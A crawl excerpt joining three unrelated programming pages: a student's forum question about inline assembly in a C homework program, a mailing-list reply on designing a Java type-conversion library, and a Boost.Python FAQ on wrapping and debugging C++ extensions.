Hi everyone, I'm new to this site and hope you might be able to help me out? So I've been given an assignment to produce this output % ./hw4b foo here foo and foo there % ./hw4b ABC123 here ABC123 and ABC123 there % ./hw4b 'where is' here where is and where is there using asm to insert the word/phrase, and only these libraries: stdlib.h, stdio.h, & string.h. I've already done most of the the C coding (shown below) I think, but I'm stuck on the asm assembler code insertion. #include <stdlib.h> #include <stdio.h> #include <string.h> char word[] = "here and there"; int sz; int wordsz; char *arg; char *result; int main(int argc, char* argv[]) { if (argc != 2) { printf("Usage: %s takes one string argument.\n", argv[0]); exit(1); } sz = strlen(argv[1]) + 1; arg = malloc(sz); strcpy(arg, argv[1]); wordsz = strlen(word) + 1; result = malloc(sz * wordsz); __asm__("\n\ movl sz, %eax\n\ "); printf("%s\n", result); return 0; } What I'm stuck on is the actual separating/parsing of the word(s) (delimited by the space ' ' character).. I mean I know that %eax can hold a long word (4 bytes), but if I recall correctly, single chars take up 1 byte each, so there is no register which can hold the entirety of word, nevermind result. Any help would be greatly appreciated! Thank you
https://www.daniweb.com/programming/software-development/threads/358099/need-help-with-asm-assembly-insert-in-my-c-code
CC-MAIN-2017-26
refinedweb
235
72.36
OH> I had a look at your ideas and now I have a few questions and remarks. Great! OH> At first let me say that I like the idea of using a graph representation [...] I definitely agree. Things get a lot easier that way. Besides, we could even support a special debug mode, where we plug in a graph renderer and thereby provide an image of the registered converters (just like the ones in the document I posted, and had drawn by hand). If a conversion succeeds we could provide an image of the path chosen (may be useful if an unexpected result pops up.) OH> The idea to use a separate lookup class seems interesting, too. But OH> after thinking a while about it I am not sure if this really helps [...] OH> registry. So this would imply that for different lookup classes other OH> data has to be stored in the registry. Can this be handled in a generic OH> way or wouldn't it be better to leave the lookup mechanism in the OH> registry and use different registry implementations? In my current line of thought the registry and lookup are quite tightly coupled, but serve different purposes. The Registry is just a plain storage, whereas the Lookup provides the algorithm(s?) to work on them. For example, the ClassConverterRegistry provides/should provide all Converters the Java language uses for a class (inheritance, toString()). But then again, something simpler like a Set or List might be better suited for that. OH> 2. A lookup might be expensive, especially if a search in a complex OH> graph has to be performed. So it might make sense to implement some OH> caching functionality. I am not sure if this can be done efficiently in OH> a lookup class implementation because in your example code always a new OH> lookup instance is created (though I might miss something here). You are right, the lookup should definitely be cached, but I didn't go that far in my implementation. I guess there are a number of things we can do, though I haven't thought them through yet. First, we could build a single graph for a Lookup and incrementally extend it (there may be times when it has to be rebuild, eg when a converter is removed, or the graph gets too big). Then, we could cache some paths, in case they are reused. The shortest path algorithm provides the shortest path to all destinations from a source, so this computation may somehow be reused, too. OH> The approach with the Types handles inheritence, but does it cover all OH> cases? I am not sure if the following use case could be handled: imagine OH> a user has the classes A, B, C, and D with B and C extending A. Then OH> there are special conversion implementations for A->D and B->D. If now OH> an object of class C is provided, will then the A->D conversion be used? OH> With other words: inheritence in direction towards the base classes is OH> surely supported, but can derived classes be handled without extra means? Yes. In my model, everything is a conversion, even inheritance, implementation of an interface, or the String conversion (toString) of any object. In your example, a chained converter would be build, to provide the conversion C -> A -> D. In the prototype, this is done via extension of the graph with the converters of the class C (see addTypeConverters for both the source and destination type). So, in the beginning you only have the converter A -> D, but as you ask for a conversion of an object of type C, the conversion C -> A is added. public ExtendedConverter lookup(final Type sourceType, final Type destinationType) throws NoSuchConversionException { addTypeConverters(graph, sourceType); addTypeConverters(graph, destinationType); return new ChainedExtendedConverter(getConvertersForPath(getShortestPath(sourceType, destinationType))); } OH> What about structural conversions, e.g. a String[] to a int[] or a OH> collection of Integers to a byte[]? Where would these conversions take OH> place? (I think this is slightly different from constructing a chain of OH> conversions because here a base conversion has to be performed multiple OH> times.) I started to think about that too, but postponed that for a version 2 of convert. Here is how far I got: I think it's better to think about String[] or int[] as a parametric type, like Array<String> or Array<int>. That way, it will be easier to think about conversions as Array<int> to List<Integer> (aside from supporting Java 1.5). Now, a converter needs to worry about the outer structure (Array -> List) and the meat (int -> Integer) (this would apply for other structures too, eg List -> Set). I could imagine an implementation like this: public class ListToSetConverter extends AbstractConverter { final Type srcParam, destParam; public ListToSetConverter(final Type srcParam, final Type destParam) { this.srcParam = srcParam; this.destParam = destParam; } public Type getSourceType() { return Types.parse("List<*>", srcParam); } public Type getDestinationType() { return Types.parse("Set<*>", destParam); } protected ConversionContext convert(final ConversionContext context) throws NoSuchConversionException, ConversionFailedException { final Set s = new HashSet(); for (final Iterator i = context.getValue(); i.hasNext();) { s.add(context.convert(i.next(), destParam)); } return context.update(s, getDestinationType()); } } "context.convert()" would provide access to the Lookup that found the converter, thereby allowing the converter to ask for conversions / call other converters. Then, "new ListToSetConverter(Integer.class, Integer.TYPE)" (or something like that) can be plugged into the graph, and be used like any other. (Of course, the Lookup must be prepared to handle parametric types, like the implicit LinkedList<Integer> -> List<Number> -> List<Number> conversion). OH> One last remark about the extended converter interface: I think I OH> understand why this ConversionContext is needed - to allow a single OH> object being treated as of different types. But I strongly agree with a OH> statement mentioned on this thread: that the converter interface should OH> be as simple as possible. So if it is possible, I would try to get rid OH> off this additional complexity. The ConversionContext would be used to supply additional information for a conversion. Currently, it only holds the perceived type and the object to convert, but could also include - reference to the Lookup, to allow a converter to ask for other conversions - isCopy field, that states that the input object is a copy (maybe from another converter) and may be used for a "destructive" conversion, eg List<Integer> -> List<String> might simply transform the Integers to String in the List, without creating a new List. - isImmutable field, that states that the given input object may not be modified, even if the object is mutable. - ... I am quite a bit torn between the possible functionality that can be provided with this information, and the simplicity of the Converter interface. Maybe we could come up with some different Converter interfaces that get increasingly complex, and would be suitable for different situations. Adapters (with additional metadata), could be used to get from the simpler to the more complex converters. We could even provide a "dynamic converter adapter" that scans any given object for convert methods (eg, any method that starts with "convert") and provides adapters for them: public class Any { public String convert(Integer i) throws SomeException { ... } } ...getSourceType() -> Integer ...getDestinationType() -> String ... Ron -- --------------------------------------------------------------------- To unsubscribe, e-mail: commons-dev-unsubscribe@jakarta.apache.org For additional commands, e-mail: commons-dev-help@jakarta.apache.org
http://mail-archives.apache.org/mod_mbox/commons-dev/200403.mbox/%3C1523221219.20040329170653@rblasch.org%3E
CC-MAIN-2014-23
refinedweb
1,236
52.49
...one of the most highly regarded and expertly designed C++ library projects in the world. — Herb Sutter and Andrei Alexandrescu, C++ Coding Standards *=operator work? typedef boost::function<void (string s) > funcptr; void foo(funcptr fp) { fp("hello,world!"); } BOOST_PYTHON_MODULE(test) { def("foo",foo) ; }And then: >>> def hello(s): ... print s ... >>> foo(hello) hello, world!The short answer is: "you can't". This is not a Boost.Python limitation so much as a limitation of C++. The problem is that a Python function is actually data, and the only way of associating data with a C++ function pointer is to store it in a static variable of the function. The problem with that is that you can only associate one piece of data with every C++ function, and we have no way of compiling a new C++ function on-the-fly for every Python function you decide to pass to foo. In other words, this could work if the C++ function is always going to invoke the same Python function, but you probably don't want that. If you have the luxury of changing the C++ code you're wrapping, pass it an object instead and call that; the overloaded function call operator will invoke the Python function you pass it behind the object.) - Break your source file up into multiple translation units. my_module.cpp:... void more_of_my_module(); BOOST_PYTHON_MODULE(my_module) { def("foo", foo); def("bar", bar); ... more_of_my_module(); } more_of_my_module.cpp:void more_of_my_module() { def("baz", baz); ... }If you find that a class_<...>declaration can't fit in a single source file without triggering the error, you can always pass a reference to the class_object to a function in another source file, and call some of its member functions (e.g. .def(...)) in the auxilliary source file: more_of_my_class.cpp:void more_of_my_class(class<my_class>& x) { x .def("baz", baz) .add_property("xx", &my_class::get_xx, &my_class::set_xx) ; ... } Greg Burley gives the following answer for Unix GCC users: Once you have created a boost python extension for your c++ library or class, you may need to debug the code. Afterall this is one of the reasons for wrapping the library in python. An expected side-effect or benefit of using BPL is that debugging should be isolated to the c++ library that is under test, given that python code is minimal and boost::python either works or it doesn't. (ie. While errors can occur when the wrapping method is invalid, most errors are caught by the compiler ;-). The basic steps required to initiate a gdb session to debug a c++ library via python are shown here. Note, however that you should start the gdb session in the directory that contains your BPL my_ext.so module.(gdb) target exec python (gdb) run >>> from my_ext import * >>> [C-c] (gdb) break MyClass::MyBuggyFunction (gdb) cont >>> pyobj = MyClass() >>> pyobj.MyBuggyFunction() Breakpoint 1, MyClass::MyBuggyFunction ... Current language: auto; currently c++ (gdb) do debugging stuff Greg's approach works even better using Emacs' " gdb" command, since it will show you each line of source as you step through it. On Windows, my favorite debugging solution is the debugger that comes with Microsoft Visual C++ 7. This debugger seems to work with code generated by all versions of Microsoft and Metrowerks toolsets; it's rock solid and "just works" without requiring any special tricks from the user. Raoul Gough has provided the following for gdb on Windows: gdb support for Windows DLLs has improved lately, so it is now possible to debug Python extensions using a few tricks. Firstly, you will need an up-to-date gdb with support for minimal symbol extraction from a DLL. Any gdb from version 6 onwards, or Cygwin gdb-20030214-1 and onwards should do. A suitable release will have a section in the gdb.info file under Configuration – Native – Cygwin Native – Non-debug DLL symbols. Refer to that info section for more details of the procedures outlined here. Secondly, it seems necessary to set a breakpoint in the Python interpreter, rather than using ^C to break execution. A good place to set this breakpoint is PyOS_Readline, which will stop execution immediately before reading each interactive Python command. You have to let Python start once under the debugger, so that it loads its own DLL, before you can set the breakpoint: $ gdb python GNU gdb 2003-09-02-cvs (cygwin-special) [...] (gdb) run Starting program: /cygdrive/c/Python22/python.exe Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> ^Z Program exited normally. (gdb) break *&PyOS_Readline Breakpoint 1 at 0x1e04eff0 (gdb) run Starting program: /cygdrive/c/Python22/python.exe Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. Breakpoint 1, 0x1e04eff0 in python22!PyOS_Readline () from /cygdrive/c/WINNT/system32/python22.dll (gdb) cont Continuing. >>> from my_ext import * Breakpoint 1, 0x1e04eff0 in python22!PyOS_Readline () from /cygdrive/c/WINNT/system32/python22.dll (gdb) # my_ext now loaded (with any debugging symbols it contains) when you run your test, because Boost.Build will then show you the exact commands it uses to invoke it. This will invariably involve setting up PYTHONPATH and other important environment variables such as LD_LIBRARY_PATH which may be needed by your debugger in order to get things to work right. *=operator work? Q: I have exported my class to python, with many overloaded operators. it works fine for me except the *=operator. It always tells me "can't multiply sequence with non int type". If I use p1.__imul__(p2)instead of p1 *= p2, it successfully executes my code. What's wrong with me? A: There's nothing wrong with you. This is a bug in Python 2.2. You can see the same effect in Pure Python (you can learn a lot about what's happening in Boost.Python by playing with new-style classes in Pure Python).>>> class X(object): ... def __imul__(self, x): ... print 'imul' ... >>> x = X() >>> x *= 1To.) For several reasons Boost.Python does not support void * as an argument or as a return value. However, it is possible to wrap functions with void * arguments or return values using thin wrappers and the opaque pointer facility. E.g.: // Declare the following in each translation unit struct void_; // Deliberately do not define BOOST_PYTHON_OPAQUE_SPECIALIZED_TYPE_ID(void_); void *foo(int par1, void *par2); void_ *foo_wrapper(int par1, void_ *par2) { return (void_ *) foo(par1, par2); } ... BOOST_PYTHON_MODULE(bar) { def("foo", &foo_wrapper); } 28 January, 2004
http://www.boost.org/doc/libs/1_31_0/libs/python/doc/v2/faq.html
CC-MAIN-2015-22
refinedweb
1,088
66.03
This example illustrates how to insert date field in your form. We are using here two fields DateField (datein and dateout) and initialize a final static variable DATE which is 0. We are taking both DateField variable in to the constructor (DateFieldExample). When application will run, first of all the startApp() method will be called and it will display the form with datein and dateout field. For the specific date we are using here java.util.Date class and java.util.TimeZone class is used to show the format of date like in figure Tue, 30 Sep, 2008. Application display as follows: When <date> is selected, a new window will open with a calendar as given below. and you can select your choice of date, month and year which will appear on the form as follows. The source code of the DateFieldExample.java is as follows: import javax.microedition.lcdui.*; import javax.microedition.midlet.MIDlet; import java.util.Date; import java.util.TimeZone; public class DateFieldExample extends MIDlet{ private Form form; private Display display; private DateField datein, dateout; private static final int DATE = 0; public DateFieldExample(){ datein = new DateField("Date In:", DateField.DATE, TimeZone.getTimeZone("GMT")); dateout = new DateField("Date Out:", DateField.DATE, TimeZone.getTimeZone("GMT")); } public void startApp(){ display = Display.getDisplay(this); Form form = new Form("Date Field"); form.append(datein); form.append(dateout); display.setCurrent(form); } public void pauseApp(){ } public void destroyApp(boolean destroy){ notifyDestroy Field Midlet Example View All Comments Post your Comment
http://roseindia.net/j2me/date-field.shtml
CC-MAIN-2016-22
refinedweb
246
50.94
The SEO community started to automate the boring stuff using Python and node JS in the last two years. Automation can save you hundreds of hours of manual work, and sometimes it can be more accurate than humans work. This tutorial will talk about automating one of the most boring tasks in our daily work, uploading content to WordPress. WordPress is one of the most popular CMS globally, and you can use it almost for everything from a news website, eCommerce, and personal blogs. I decided to find a way to automate uploading content to WordPress, and I have built three websites using this method. The first one is Arab Crypto Cap. It's a website that provides prices for Crypto Currency in Arabic using Coin Gecko API. The second one was for experimental purposes. I scraped the content from Healthline.com and published it. The third website is for providing nutrition facts about food. I gathered the data from different sources and published them with images using Pexesl API. All the websites I built using this method except Arab Crypto Cap are for experimental purposes, not generating revenues. The original sources of content are mentioned on each page. You can use this method to automate publishing content on WordPress if you have one of the below cases WordPress REST API is an application programming interface that can connect your WordPress website with other applications that allow you to interact with the WordPress core without touching the CMS. The most powerful thing here is that you can get the benefits of all WordPress core and plugins to connect it with other applications. And many other things you can achieve using REST API. You only need an idea and data, and then you can automate your work using this method. In this tutorial, we will use Python to publish content on our WordPress website with the help of REST API. It is very easy to use them to achieve many things and publish thousands of pages in hours. Before we start, make sure to have Try this tutorial on a staging environment or your local machine. It's 100% safe and tested many times. But as usual, it is better to test locally and then move to the production environment. For this tutorial, we need only one plugin that allows our Python application to connect to our WordPress website using REST API. This plugin is called Application Password. You can download it for free and install it on your website. In WordPress 5.6, this plugin has been migrated with the core. You can download this plugin only from your WordPress plugins page, and you won't find it on wordpress.org. You can follow this guide to use the core feature. After installing the plugin, go to the Edit Profile page, and scroll down to the bottom of the page. You will find a new field and button, add a name for your application and click on create a password. After clicking on Add New, a pop-up will appear with your application password, and this password will be used in our Python application. Make sure to store this password safely, don't share it with anyone, and remove this plugin when you are done with it. make sure to install the below Python libraries on your machine import pandas as pd import base64 import requests from tqdm.notebook import tqdm import json To test the REST API on your WordPress website, go to this link, and you will see a JSON response on your browser. Change localhost/wordpress_local with your website name, for example: Then in our Python application, we need to define a user and password, and link. user = 'admin' password = 'Cd4n 9jBk w9Bn hFoj yFDR Qchw' url = '' Encode the connection of your WordPress website wp_connection = user + ':' + password token = base64.b64encode(wp_connection.encode()) Prepare the header of our request headers = {'Authorization': 'Basic ' + token.decode('utf-8')} Define a title for our first post post_title = "This is my first post using Python and REST API" Define a body for our post post_body = "This is the body content of my first post and i am very happy" Then we need to set the type of our post and assign the content values to it using a Python dictionary post = {'title': post_title, 'status': 'publish', 'content': post_body, 'author': '1', 'format': 'standard' } Finally, we will perform the request on the REST API to insert the post. wp_request = requests.post(url + '/posts', headers=headers, json=post) Now go to your WordPress posts list, and you should see your first post published. I am sure that you are happy now, and the ideas started rushing in your mind to create websites and automate your work. Now we will create more posts and assign them to categories, and upload images. But before that, let's install some of the most popular WordPress Plugins and see how the REST API and the WordPress core will interact with each other. We will install the below plugins and use them later in our next project: Now we will build a project to experiment with many things using Python and WordPress. Our project will be about my country Jordan that will include articles about places and food dishes. I highly recommend you visit my country Jordan, we have many lovely places to visit and delicious food to eat like Mansaf. Our plan will be: Here we will add three categories manually to our WordPress website and will call them: In case you have many categories on our website, you can get the IDs of the categories directly from the database to use in our Python script by performing the below queries use wordpress_local; show tables; describe wp_terms; select term_id,name from wp_terms; And then extract them in a CSV format. We will open a Google sheet and add three columns to add titles for our content and assign categories for them. There is no information on Wikipedia about Jordanian food, so I decided to add other types of food. Now export the Google sheet to a CSV file to use in our Python script. Now we will use Wikipedia API to get content about our topics. I will leave you with a tutorial from our friend Jean Christophe Chouinard. he has a whole article about Wikipedia API and its use. Read and display our data in Pandas data frame Define a function to get the data from Wikipedia def get_wiki(title): subject = title url = '' params = { 'action': 'query', 'format': 'json', 'titles': subject, 'prop': 'extracts', 'exintro': True, 'explaintext': True, } response = requests.get(url, params=params) data = response.json() page = next(iter(data['query']['pages'].values())) try: return page["extract"] except: return "No Wiki Data" Loop over the titles and pass them to the Wikipedia function data["Wikipedia English Description"] = data["Title"].apply(lambda title : get_wiki(title)) And now we have our data from the Wikipedia API. The next step is to translate the content and the titles to Spanish from deep_translator import GoogleTranslator def translate_content(original_text,language): translated_content = GoogleTranslator(source='auto', target=language).translate(original_text) return translated_content data["Spanish Title"] = data["Title"].apply(lambda title : translate_content(title,"es")) data["Spanish Wikipedia Description"] = data["Wikipedia English Description"].apply(lambda description : translate_content(description,"es")) Now we have the original content and the translated in the same data frame Now it's time to get free high-quality images from Pexels API. It is a website that provides free high-quality images that you can use in your website without attribution to the owner. Sign up on their website and get an API key. It is free and easy to use. We will use our English titles to get images from the API, and sometimes you can't find the images you want. The API will return the most relevant images to your keyword. In the API request, we will pass our category and title so that the API can get us images from the most relevant category. Step to get images from Pexels API Request the image from Pexels API def get_pixabay_image(row): item_name = row["Title"].replace(" ","+") category = row["Category Name"] url = f"{item_name}&image_type=photo&orientation=all&category={category}&safesearch=true&order=popular&per_page=3" page = requests.get(url) json_data = page.json() try: image_url = json_data["hits"][0]["largeImageURL"] return image_url except: return "No Image" data["Pixels Image URL"] = data.apply(lambda row: get_pixabay_image(row), axis=1) Now we have the image's URLs from Pexels website Change xxxxx with your API key Now we will download the images on our machine and optimize the quality to 70% to reduce the file size. Create a new folder where your script is placed and name it images. inside it, create two other folders for optimizing the images and call them big and small from PIL import Image def download_image(row): # Download Image response = requests.get(row["Pixels Image URL"]) image_name = row["Spanish Title"].lower().replace(" ","-") file = open(f"images/big/{image_name}.jpg", "wb") file.write(response.content) file.close() # Convert Image Quality image_file = Image.open(f"images/big/{image_name}.jpg") image_file = image_file.convert('RGB') image_file.save(f"images/small/{image_name}.jpg", quality=70) def generate_images(row): if row["Pixels Image URL"] != "No Image": download_image(row) return row["Spanish Title"].lower().replace(" ","-") + ".jpg" else: return "No Image" data["Local Image Path"] = data.apply(lambda row : generate_images(row), axis=1) Results Images Now we are ready to upload the content on WordPress. We have the translated content and the optimized images. def wp_insert(post_title, post_content, category, image_path): media = { 'file': open("images/small/" + image_path,'rb'), } image = requests.post(url + '/media', headers = headers, files = media) imageID = str(json.loads(image.content)['id']) post = {'title': post_title, 'status': 'publish', 'content': post_content, 'categories': category, 'featured_media': imageID, 'author': '1', 'format': 'standard' } wp_insert_request = requests.post(url + '/posts', headers=headers, json=post) for index, row in tqdm(data.iterrows()): wp_insert(row["Spanish Title"], row["Spanish Wikipedia Description"], row["Category ID"], row["Local Image Path"]) print("Done") And now you have all your posts on your website published with optimized images using the downloaded image optimization plugin. Homepage content You can find the complete script in this Google Colab Notebook If you have any questions, feel free to reach out to me on my Linkedin Profile.
https://www.nadeem.tech/wordpress-publishing-automation-with-python/
CC-MAIN-2022-27
refinedweb
1,710
54.32
You will have seen earlier in all the programs of exception handling that Java runtime system was responsible for identifying exception class, creating its object, and throwing that object. JVM automatically throws system generated exceptions. All those exceptions are called implicit exceptions. If we want to throw an exception manually or explicitly, for this, Java provides a keyword throw. Throw Keyword in Java Throw in Java is a keyword that is used to throw a built-in exception or a custom exception explicitly or manually. Using throw keyword, we can throw either checked or unchecked exceptions in java programming. When an exception occurs in the try block, throw keyword transfers the control of execution to the caller by throwing an object of exception. Only one object of exception type can be thrown by using throw keyword at a time. Throw keyword can be used inside a method or static block provided that exception handling is present. The syntax to throw an exception manually is as follows: Syntax: throw exception_name; where exception_name is a reference to an object of Throwable class or its subclass. For example: throw new ArithmeticException(); or ArithmeticException ae = new ArithmeticException(); throw ae; throw new NumberFormatException(); Key points: 1. The object of Throwable class or its subclasses can be created using new keyword or using a parameter inside catch clause. 2. Instances of classes other than Throwable class or its subclasses cannot be used as exception objects. Control flow of try-catch block with throw Statement in Java When a throw statement is encountered in a program, the flow of execution of subsequent statements stops immediately in the try block and the corresponding catch block is searched. The nearest try block is inspected to see if it has a catch block that matches the type of exception. If corresponding catch block is found, it is executed otherwise the control is transferred to the next statement. In case, no matching catch block is found, JVM transfers the control of execution to the default exception handler that stops the normal flow of program and displays error message on the output screen. Java Throw Exception Example Program In this section, we will know how to throw exception in Java manually. Let’s take an example program to throw an exception using new keyword. Program source code 1: public class ThrowTest1 { public static void main(String[] args) { try { ArithmeticException a = new ArithmeticException("Hello from throw"); throw a; // Exception thrown explicitly. // Line 7 and 8 can be written also in one line like this: // throw new ArithmeticException("Hello from throw"); } catch(ArithmeticException ae){ System.out.println("ArithmeticException caught: \n" +ae); System.out.println(ae.getMessage()); } } } Output: ArithmeticException caught: java.lang.ArithmeticException: Hello from throw Hello from throw Explanation: In the main() method of class ThrowTest1, the try block creates an object of ArithmeticException class with reference variable a and passing an argument of String type to its constructor. The exception object is then thrown by the statement: throw a; The thrown exception object is caught by corresponding catch block and stored in ae. The ae.getMessage() displays a string message append along with the internally generated message. Program source code 2: public class ThrowTest2 { public static void main(String[] args) { int x = 20; int y = 0; try { int z = x/y; // Exception occurred. System.out.println("Result: " +z); throw new ArithmeticException(); } catch(ArithmeticException ae){ System.out.println("Exception caught: \n" +ae); } } } Output: Exception caught: java.lang.ArithmeticException: / by zero As you can see in line 9, when the exception occurred, the rest of code (line 10) did not execute. Program source code 3: public class ThrowTest3 { public static void main(String[] args) { int x = 20; int y = 0; try { int z = x/y; throw new ArithmeticException(); System.out.println("Result: " +z); // Unreachable code. } catch(ArithmeticException ae){ System.out.println("Exception caught: \n" +ae); } } } Output: Exception in thread "main" java.lang.Error: Unresolved compilation problem: Unreachable code In the preceding program, when we have written a statement after throw statement, we got unreachable code. Due to which code could not be compiled. Program source code 4: public class ThrowTest4 { public static void main(String[] args) { int num = 1; for(num = 1; num <= 10; num++){ try { if(num == 5) throw new ArithmeticException("ArithmeticException"); else if(num < 2) throw new RuntimeException("RuntimeException"); else if(num > 9) throw new NullPointerException("NullPointerException"); } catch(Exception e) { System.out.println("Caught an exception"); System.out.println(e.getMessage()); } } } } Output: Caught an exception RuntimeException Caught an exception ArithmeticException Caught an exception NullPointerException Program source code 5: class Test1 extends Exception { } class Test2 extends Exception { } class Test3 extends Exception { } public class ThrowTest5 { public static void main(String[] args) { int num = 1; for(num = 1; num <= 10; num++){ try { if(num == 5) throw new Test1(); else if(num < 2) throw new Test2(); else if(num > 9) throw new Test3(); } catch(Exception e) { System.out.println("Caught an exception"); } } }} Output: Caught an exception Caught an exception Caught an exception Rethrowing an Exception in Java Java version 7 introduces a mechanism rethrowing an exception. When an exception occurs in a try block, it is caught by a catch block inside the same method. The same exception object out from catch block can be rethrown explicitly using throw keyword. This is called rethrowing of exception in Java. When the same exception object is rethrown, it preserves details of original exception. The following snippet code shows how to rethrow the same exception object out from catch block: try { // Code that might throw Exception. } catch(Exception e) { // Rethrow the same exception. throw e; } Let’s take an example program where we will throw StringIndexOutofBoundsException. This exception generally occurs when a string index out of range. Program source code 6: public class A { void m1() { try { // Taking a string with 9 chars. Their index will be from 0 to 8. String str = "Scientech"; char ch = str.charAt(10); // Exception is thrown because there is no index with value 10. } catch(StringIndexOutOfBoundsException se){ System.out.println("String index out of range"); throw se; // Rethrow the same exception. } } } public class B { public static void main(String[] args) { // Create an object to class A and call m1() method. A a = new A(); try { a.m1(); } // Rethrown exception is caught by below catch block. catch(StringIndexOutOfBoundsException se){ System.out.println("Rethrow exception is caught here: " +se); } } } In this program, there are two classes A and B. StringIndexOutOfBoundsException is thrown in m1() method of class A that is caught and handled by catch block in that method. Now, we want to propagate exception details to another class B. For this, catch block of class A is rethrowing it into the main method of class B where it can be handled. Hence, we can rethrow an exception from catch block to another class where it can be handled. Let’s take another program where we will catch an exception of one type and rethrow an exception of another type. Program source code 7: public class A { public static void main(String[] args) { try { m1(); } catch(ArithmeticException ae) { System.out.println("An exception of another type is recaught: \n" +ae); } } static void m1(){ try { int a[] = {1, 2, 3, 4, 5}; System.out.println(a[5]); // Exception is thrown because there is no index with value 5. } catch(ArrayIndexOutOfBoundsException aie){ System.out.println("Array index out of range: \n" +aie); throw new ArithmeticException(); // Rethrow another type exception. } } } Output: Array index out of range: java.lang.ArrayIndexOutOfBoundsException: 5 An exception of another type is recaught: java.lang.ArithmeticException In this example program, catch block catches ArrayIndexOutOfBoundsException, and rethrow another type ArithmeticException. Final words Throw keyword in Java programming language is mainly used to throw an exception manually. It takes the exception object of Throwable class as an argument. It can also be used to break a switch statement without using a break keyword.
https://www.scientecheasy.com/2020/05/throw-keyword-in-java.html/
CC-MAIN-2020-24
refinedweb
1,306
55.13
#endif // include files #if (defined __GNUC__) && (defined __MINGW32__) #if (defined __GNUC__) && (defined __MINGW32__) && (__SIZEOF_POINTER__ == 8) #include <intrin.h> //including intrin.h works around a MINGW bug //including intrin.h works around a MINGW-w64 bug //in essence, intrin.h is included by windows.h and also declares intrinsics (just as emmintrin.h etc. below do). However, //intrin.h uses an extern "C" declaration, and g++ thus complains of duplicate declarations with conflicting linkage. The linkage for intrinsics //doesn't matter, but at that stage the compiler doesn't know; so, to avoid compile errors when windows.h is included after Eigen/Core, //include intrin here. //include intrin here. We do this only in 64-bit since plain mingw doesn't have intrin.h. #include <emmintrin.h> #include <xmmintrin.h>
http://eigen.tuxfamily.org/bz/attachment.cgi?id=45&amp;action=diff
CC-MAIN-2018-22
refinedweb
129
53.58
Hello, I'm developing a new protocol using PyRosetta. I hoped to use Rosetta's built-in random functions (numeric::random::gaussian for example) but couldn't find them in PyRosetta under numeric (numeric.random does not exist) Is there a way to access them? I remember reading that having a good random generator for stochastic highly-parallelized application is quite important. Does it make sense to use Python's built-in random class in case it did not work with Rosetta's? Thank you! You may need to explicitly import the rosetta.numeric.random module. The following works for me: import rosetta rosetta.init() import rosetta.numeric.random rosetta.numeric.random.gaussian() 0.030388865984531391 rosetta.numeric.random.gaussian() -1.4610886425562437 If that doesn't work for you, what version of PyRosetta are you using? Both Rosetta and Python use the Mersenne Twister as a PRNG, so the quality of the random numbers should be comparable. The one concern you may have about things is that using multiple different random number generators in parallel is apparently sub-optimal. (See "Don't Trust Parallel Monte Carlo!" by Peter Hellekalek for details.) How big an issue likely depends on how integrated the decision path using the multiple random number generators are. (Light usage of the PyRosetta PRNG is probably not a substantial issue.) Thank you explication and the fix! That does indeed work. If I may ask, why is an explicit import needed. I thought doing so: import rosetta as r r.numeric.random.gaussian() (which returns AttributeError: 'module' object has no attribute 'random') would be equivalent to an explicit import. Yours It's actually a general feature of Python modules. Nested modules are not automatically loaded when a parent module is loaded. There are some modules which do load their sub-modules (for example, "import os" typically also loads os.path), but that's generally not the case. If you need the sub-module, you need to load it specifically. Same thing with Rosetta modules. Some of the submodules are automatically loaded when you import just rosetta, but others (especially the more rarely used ones) have to be manually imported before their contents can be used. So "import rosetta" does the equivalent of "import rosetta.numeric" but it doesn't do "import rosetta.numeric.random" (note that once imported, the module is available through all aliases, so "import rosetta as r; import rosetta.numeric.random; r.numeric.random.gaussian()" should work.) You should be able to see which modules from PyRosetta are currently loaded with the command: print '\n'.join([ m for m in sorted(sys.modules.keys()) if m.startswith("rosetta") ])
https://rosettacommons.org/node/3850
CC-MAIN-2022-27
refinedweb
441
51.34
In HTML/CSS font size can be specified in the following fashion (deprecated but all browsers support it): <font size="n">text</font> with n an element of {1, 2, 3, 4, 5, 6, 7}. n {1, 2, 3, 4, 5, 6, 7} Another possibility is the following: <span style="font-size: s;">text</span> with there facto relation between font size We have code like: ms = New IO.MemoryStreambin = New System.Runtime.Serialization.Formatters.Binary.BinaryFormatterbin.Serialize(ms, largeGraphOfObjects)dataToSaveToDatabase = ms.ToArray()// put dataToSaveToDatabase in a Sql server BLOB But the memory steam allocates a large buffer from the large memory heap that is giving us problems. Please help me understand which of the following is better for scaling and performance. Table: testcolumns: id <int, primary key>, doc <int>, keyword <string> The data i want to store is a pointer to the documents containing a particular keyword Design 1: have unique constraint on the keyword column and stor I've got a CMS I'm building where I've got a rather large form full of data to add to my database. This is where I collect my variables.... $orgName = $_POST['orgName'];$impact = $_POST['impact'];$headline = $_POST['headline'];$content = $_POST['content'];$subContent = $_POST['subContent'];$meterText = $_POST['meterText'];$m I have an MVC method: public void PushFile([FromBody]FileTransport fileData) Class is: public class FileTransport { public string fileData; } In fileData I put byte[] from a file converted into a string (UTF-8), so the string can be large. byte[] string Problem is: if t Me and a friend are currently looking at developing a game, with similarities to a certain trademarked francise. To define the units in the game, we've created an abstract class which denotes the 44 variables, and two methods that need to be instantiated with each instance of a unit. The next step in this game would be to of course, define all the units in the game. Unfortunately, I have 648 un I am parsing a large html website that has over 1000 href links. I am using Beautifulsoup to get all the links but second time when I run the program again, beautifulsoup cannot handle it. (find specific all 'td' tags. how will I overcome this problem? Though I can load the html page with urllib, all the links cannot be printed. When I use it with find one 'td' tag, it is passed. I have a large XML file that consists of relatively fixed size items i.e. <rootElem> <item>...</item> <item>...</item> <item>...</item><rootElem> The item elements are relatively shallow and typically rather small ( <100 KB), but there may be a lot of them (hundreds of thousands). T I have a dataset of about 10mm hashes. I need to allow people to compare a list of hashes against those to see if they match or not. Right now we use sql and basically scan it for each of the items in the guessing array. This worked for about 10K but users are needing to check a larger set, something like 200K hashes against a dictionary of 10mm hashes what might be a good approach Recently i change to a dedicated server and i start having problems to save large string in a jquery ajax post. in the old server works fine's but in this new server i get an Apache 413 error. Firebug send this response: Encabezados de la respuestaConnection closeContent-Encoding gzipContent-Length 331Content-Type text/html; charset=iso
http://bighow.org/tags/Large/1
CC-MAIN-2017-47
refinedweb
580
59.13
